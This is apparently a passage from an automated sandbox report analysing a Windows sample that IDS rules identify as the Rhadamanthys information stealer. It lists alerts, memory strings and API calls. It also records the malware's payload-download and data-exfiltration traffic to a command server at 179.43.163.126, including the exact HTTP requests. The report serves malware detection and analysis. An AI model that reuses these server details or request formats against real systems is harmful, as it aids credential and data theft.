                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 179.43.163.126 80Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.5:49700 -> 179.43.163.126:80
                      Source: TrafficSnort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 179.43.163.126:80 -> 192.168.2.5:49700
                      Source: TrafficSnort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.5:49701 -> 179.43.163.126:80
                      Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: rundll32.exeString found in binary or memory: https://discord.com
                      Source: rundll32.exeString found in binary or memory: https://discordapp.com
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD55E8 WSARecv,4_2_00007DF471DD55E8
                      Source: global trafficHTTP traffic detected: GET /datalib/vldfce.hrgh HTTP/1.1Host: 179.43.163.126User-Agent: curl/5.9Connection: closeX-CSRF-TOKEN: KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==Cookie: CSRF-TOKEN=KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==; LANG=en-US
                      Source: global trafficHTTP traffic detected: GET /datalib/vldfce.hrgh HTTP/1.1Host: 179.43.163.126User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 5p53O3OKTa7Wme0
                      Source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectDrawCreateEx Callout.
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData
                      Source: Yara matchFile source: 1.3.MqE1p1WFrf.exe.2830000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.MqE1p1WFrf.exe.2830000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8ee0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.359030553.0000017ED8C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.359569400.0000017ED8EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MqE1p1WFrf.exe PID: 3648, type: MEMORYSTR
                      Source: MqE1p1WFrf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 648
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_004086161_2_00408616
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE12F84_2_00007FFA06EE12F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE70884_2_00007FFA06EE7088
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE4A1C4_2_00007FFA06EE4A1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD22B34_2_0000017ED6FD22B3
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD50944_2_0000017ED6FD5094
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD54144_2_0000017ED6FD5414
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD29F84_2_0000017ED6FD29F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD59944_2_0000017ED6FD5994
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD19684_2_0000017ED6FD1968
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD455C4_2_0000017ED6FD455C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017ED6FD25584_2_0000017ED6FD2558
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA87184_2_00007DF471DA8718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA36A04_2_00007DF471DA36A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA15E44_2_00007DF471DA15E4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DDB0C84_2_00007DF471DDB0C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E080904_2_00007DF471E08090
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD12244_2_00007DF471DD1224
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DDD5584_2_00007DF471DDD558
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471D915304_2_00007DF471D91530
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E284C44_2_00007DF471E284C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DDA3F44_2_00007DF471DDA3F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471D903D84_2_00007DF471D903D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DE37544_2_00007DF471DE3754
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DF673C4_2_00007DF471DF673C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E136E84_2_00007DF471E136E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E1A6984_2_00007DF471E1A698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471D9D6084_2_00007DF471D9D608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD75A84_2_00007DF471DD75A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E399644_2_00007DF471E39964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E419684_2_00007DF471E41968
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD19004_2_00007DF471DD1900
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DFF8644_2_00007DF471DFF864
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA98284_2_00007DF471DA9828
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DDB77C4_2_00007DF471DDB77C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD9B344_2_00007DF471DD9B34
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E1EB344_2_00007DF471E1EB34
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E35B3C4_2_00007DF471E35B3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E16AA04_2_00007DF471E16AA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DF4A184_2_00007DF471DF4A18
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DDC9FC4_2_00007DF471DDC9FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA99F04_2_00007DF471DA99F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E29D584_2_00007DF471E29D58
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DEBC884_2_00007DF471DEBC88
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD0C584_2_00007DF471DD0C58
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471D93C684_2_00007DF471D93C68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD1C4C4_2_00007DF471DD1C4C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD0E984_2_00007DF471DD0E98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E0AE884_2_00007DF471E0AE88
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DB6E604_2_00007DF471DB6E60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471D9FE384_2_00007DF471D9FE38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471E52DE44_2_00007DF471E52DE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DF0DF04_2_00007DF471DF0DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DB2FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose,4_2_00007DF471DB2FA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DB2834 NtQuerySystemInformation,4_2_00007DF471DB2834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DB2E88 NtOpenFile,4_2_00007DF471DB2E88
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310927358.00000000029E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315108088.000000000278A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020DC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameimm32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.0000000003EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002712000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358376583.00000000025CF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -%system32%%systemroot%\system32%sysnative%%windir%%programfilesnative%%systemdrive%\Program FilesCommonFilesDirCommonProgramFilesCommonFilesDir (x86)CommonProgramFiles(x86)ProgramFilesDirProgramFilesProgramFilesDir (x86)ProgramFiles(x86)ProgramDataPublicWIN16WIN32DOSUNKNOWNProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright\StringFileInfo\000004B0\\StringFileInfo\000004E4\\StringFileInfo\040904B0\\StringFileInfo\040904E4\__PROCESS_HISTORYDATABASELIBRARYINEXCLUDESHIMPATCHAPPEXEEXE_TYPEMATCHING_FILESHIM_REFPATCH_REFLAYERFILEAPPHELPLINKDATAMSI_TRANSFORMMSI_TRANSFORM_REFMSI_PACKAGEFLAGCONTEXTMSI_CUSTOM_ACTIONFLAG_REFCONTEXT_REFACTIONLOOKUPNAMEDESCRIPTIONMODULEAPIVENDORAPP_NAMECOMMAND_LINEDLLFILEWILDCARD_NAMEAPPHELP_DETAILSLINK_URLLINK_TEXTAPPHELP_TITLEAPPHELP_CONTACTSXS_MANIFESTDATA_STRINGMSI_TRANSFORM_FILELAYER_DISPLAYNAMECOMPILER_VERSIONACTION_TYPESTRINGTABLEOFFSETSHIM_TAGIDPATCH_TAGIDPREVOSMAJORVERPREVOSMINORVERPREVOSPLATFORMIDPREVOSBUILDNOPROBLEMSEVERITYLANGIDENGINEHTMLHELPIDINDEX_FLAGSFLAGSDATA_VALUETYPEDATA_DWORDLAYER_TAGIDMSI_TRANSFORM_TAGIDFROM_LINK_DATEUPTO_LINK_DATEFLAG_TAGIDCONTEXT_TAGIDRUNTIME_PLATFORMGUEST_TARGET_PLATFORMURLURL_IDAPP_NAME_RC_IDVENDOR_NAME_RC_IDSUMMARY_MSG_RC_IDDESCRIPTION_RC_IDPARAMETER1_RC_IDTAGIDSTRINGTABLE_ITEMINCLUDEGENERALMATCH_LOGIC_NOTAPPLY_ALL_SHIMSUSE_SERVICE_PACK_FILESMITIGATION_OSMONITORING_OFFTELEMETRY_OFFRAC_EVENT_OFFSHIM_ENGINE_OFFLAYER_PROPAGATION_OFFBLOCK_UPGRADEBLOCK_UPGRADE_TYPEREINSTALL_UPGRADEREINSTALL_UPGRADE_TYPEINCLUDEEXCLUDEDLLTIMEMODTIMEFLAG_MASK_KERNELFROM_BIN_PRODUCT_VERSIONUPTO_BIN_PRODUCT_VERSIONDATA_QWORDFLAG_MASK_USERFLAGS_NTVDM1FLAGS_NTVDM2FLAGS_NTVDM3FLAG_MASK_SHELLFLAG_MASK_WINRTFROM_BIN_FILE_VERSIONUPTO_BIN_FILE_VERSIONFLAG_MASK_FUSIONFLAG_PROCESSPARAMFLAG_LUAFLAG_INSTALLPATCH_BITSFILE_BITSEXE_IDDATA_BITSMSI_PACKAGE_IDDATABASE_IDINDEX_BITSINDEXESINDEXMATCH_MODETAGINDEX_TAGINDEX_KEYCONTEXT_PLATFORM_IDCONTEXT_BRANCH_IDFIX_IDAPP_IDKDEVICEKDRIVERMATCHING_DEVICEACPIBIOSCPUOEMKFLAGKFLAG_REFKDATAKSHIMKSHIM_REFVENDOR_IDDEVICE_IDSUB_VENDOR_IDSUB_SYSTEM_IDREVISION_EQREVISION_LEREVISION_GEDATE_EQDATE_LEDATE_GECPU_MODEL_EQCPU_MODEL_LECPU_MODEL_GECPU_FAMILY_EQCPU_FAMILY_LECPU_FAMILY_GECREATOR_REVISION_EQCREATOR_REVISION_LECREATOR_REVISION_GEFORCE_CACHETRACE_PCAPACKAGEID_NAMEPACKAGEID_PUBLISHERPACKAGEID_ARCHITECTUREPACKAGEID_LANGUAGEPACKAGEID_VERSIONFROM_PACKAGEID_VERSIONUPTO_PACKAGEID_VERSIONOSMAXVERSIONTESTEDFROM_OSMAXVERSIONTESTEDUPTO_OSMAXVERSIONTESTEDROUTING_MODEOS_VERSION_VALUEQUIRKQUIRK_TAGIDQUIRK_REFQUIRK_ENABLED_VERSION_LTQUIRK_COMPONENT_CODE_IDQUIRK_CODE_IDQUIRK_OFFELEVATED_PROP_OFFMIGRATION_DATAMIGRATION_DATA_TYPEMIGRATION_DATA_REFMIGRATION_DATA_TEXTMIGRATION_DATA_TAGIDBIOS_BLOCKMATCHING_INFO_BLOCKDEVICE_BLOCKUPGRADE_DRIVER_BLOCKMANUFACTURERMODELDATEUPGRADE_DATAMATCHING_REGREG_VALUE_NAMEREG_VALUE_TYPEREG_VALUE_DATA_SZREG_VALUE_DATA_DWORDREG_VALUE_DATA_QWORDREG_VALUE_DATA_BINARYMATCHING_TEXTTEXTTEXT_ENCODINGMACHINE_BLOCKSHIM_CLASSOS_UPGRADEPACKAGEE
                      Source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApphelpj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.317707376.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -%system32%%systemroot%\system32%sysnative%%windir%%programfilesnative%%systemdrive%\Program FilesCommonFilesDirCommonProgramFilesCommonFilesDir (x86)CommonProgramFiles(x86)ProgramFilesDirProgramFilesProgramFilesDir (x86)ProgramFiles(x86)ProgramDataPublicWIN16WIN32DOSUNKNOWNProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright\StringFileInfo\000004B0\\StringFileInfo\000004E4\\StringFileInfo\040904B0\\StringFileInfo\040904E4\__PROCESS_HISTORYDATABASELIBRARYINEXCLUDESHIMPATCHAPPEXEEXE_TYPEMATCHING_FILESHIM_REFPATCH_REFLAYERFILEAPPHELPLINKDATAMSI_TRANSFORMMSI_TRANSFORM_REFMSI_PACKAGEFLAGCONTEXTMSI_CUSTOM_ACTIONFLAG_REFCONTEXT_REFACTIONLOOKUPNAMEDESCRIPTIONMODULEAPIVENDORAPP_NAMECOMMAND_LINEDLLFILEWILDCARD_NAMEAPPHELP_DETAILSLINK_URLLINK_TEXTAPPHELP_TITLEAPPHELP_CONTACTSXS_MANIFESTDATA_STRINGMSI_TRANSFORM_FILELAYER_DISPLAYNAMECOMPILER_VERSIONACTION_TYPESTRINGTABLEOFFSETSHIM_TAGIDPATCH_TAGIDPREVOSMAJORVERPREVOSMINORVERPREVOSPLATFORMIDPREVOSBUILDNOPROBLEMSEVERITYLANGIDENGINEHTMLHELPIDINDEX_FLAGSFLAGSDATA_VALUETYPEDATA_DWORDLAYER_TAGIDMSI_TRANSFORM_TAGIDFROM_LINK_DATEUPTO_LINK_DATEFLAG_TAGIDCONTEXT_TAGIDRUNTIME_PLATFORMGUEST_TARGET_PLATFORMURLURL_IDAPP_NAME_RC_IDVENDOR_NAME_RC_IDSUMMARY_MSG_RC_IDDESCRIPTION_RC_IDPARAMETER1_RC_IDTAGIDSTRINGTABLE_ITEMINCLUDEGENERALMATCH_LOGIC_NOTAPPLY_ALL_SHIMSUSE_SERVICE_PACK_FILESMITIGATION_OSMONITORING_OFFTELEMETRY_OFFRAC_EVENT_OFFSHIM_ENGINE_OFFLAYER_PROPAGATION_OFFBLOCK_UPGRADEBLOCK_UPGRADE_TYPEREINSTALL_UPGRADEREINSTALL_UPGRADE_TYPEINCLUDEEXCLUDEDLLTIMEMODTIMEFLAG_MASK_KERNELFROM_BIN_PRODUCT_VERSIONUPTO_BIN_PRODUCT_VERSIONDATA_QWORDFLAG_MASK_USERFLAGS_NTVDM1FLAGS_NTVDM2FLAGS_NTVDM3FLAG_MASK_SHELLFLAG_MASK_WINRTFROM_BIN_FILE_VERSIONUPTO_BIN_FILE_VERSIONFLAG_MASK_FUSIONFLAG_PROCESSPARAMFLAG_LUAFLAG_INSTALLPATCH_BITSFILE_BITSEXE_IDDATA_BITSMSI_PACKAGE_IDDATABASE_IDINDEX_BITSINDEXESINDEXMATCH_MODETAGINDEX_TAGINDEX_KEYCONTEXT_PLATFORM_IDCONTEXT_BRANCH_IDFIX_IDAPP_IDKDEVICEKDRIVERMATCHING_DEVICEACPIBIOSCPUOEMKFLAGKFLAG_REFKDATAKSHIMKSHIM_REFVENDOR_IDDEVICE_IDSUB_VENDOR_IDSUB_SYSTEM_IDREVISION_EQREVISION_LEREVISION_GEDATE_EQDATE_LEDATE_GECPU_MODEL_EQCPU_MODEL_LECPU_MODEL_GECPU_FAMILY_EQCPU_FAMILY_LECPU_FAMILY_GECREATOR_REVISION_EQCREATOR_REVISION_LECREATOR_REVISION_GEFORCE_CACHETRACE_PCAPACKAGEID_NAMEPACKAGEID_PUBLISHERPACKAGEID_ARCHITECTUREPACKAGEID_LANGUAGEPACKAGEID_VERSIONFROM_PACKAGEID_VERSIONUPTO_PACKAGEID_VERSIONOSMAXVERSIONTESTEDFROM_OSMAXVERSIONTESTEDUPTO_OSMAXVERSIONTESTEDROUTING_MODEOS_VERSION_VALUEQUIRKQUIRK_TAGIDQUIRK_REFQUIRK_ENABLED_VERSION_LTQUIRK_COMPONENT_CODE_IDQUIRK_CODE_IDQUIRK_OFFELEVATED_PROP_OFFMIGRATION_DATAMIGRATION_DATA_TYPEMIGRATION_DATA_REFMIGRATION_DATA_TEXTMIGRATION_DATA_TAGIDBIOS_BLOCKMATCHING_INFO_BLOCKDEVICE_BLOCKUPGRADE_DRIVER_BLOCKMANUFACTURERMODELDATEUPGRADE_DATAMATCHING_REGREG_VALUE_NAMEREG_VALUE_TYPEREG_VALUE_DATA_SZREG_VALUE_DATA_DWORDREG_VALUE_DATA_QWORDREG_VALUE_DATA_BINARYMATCHING_TEXTTEXTTEXT_ENCODINGMACHINE_BLOCKSHIM_CLASSOS_UPGRADEPACKAGEE
                      Source: MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApphelpj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecurity.dllj% vs MqE1p1WFrf.exe
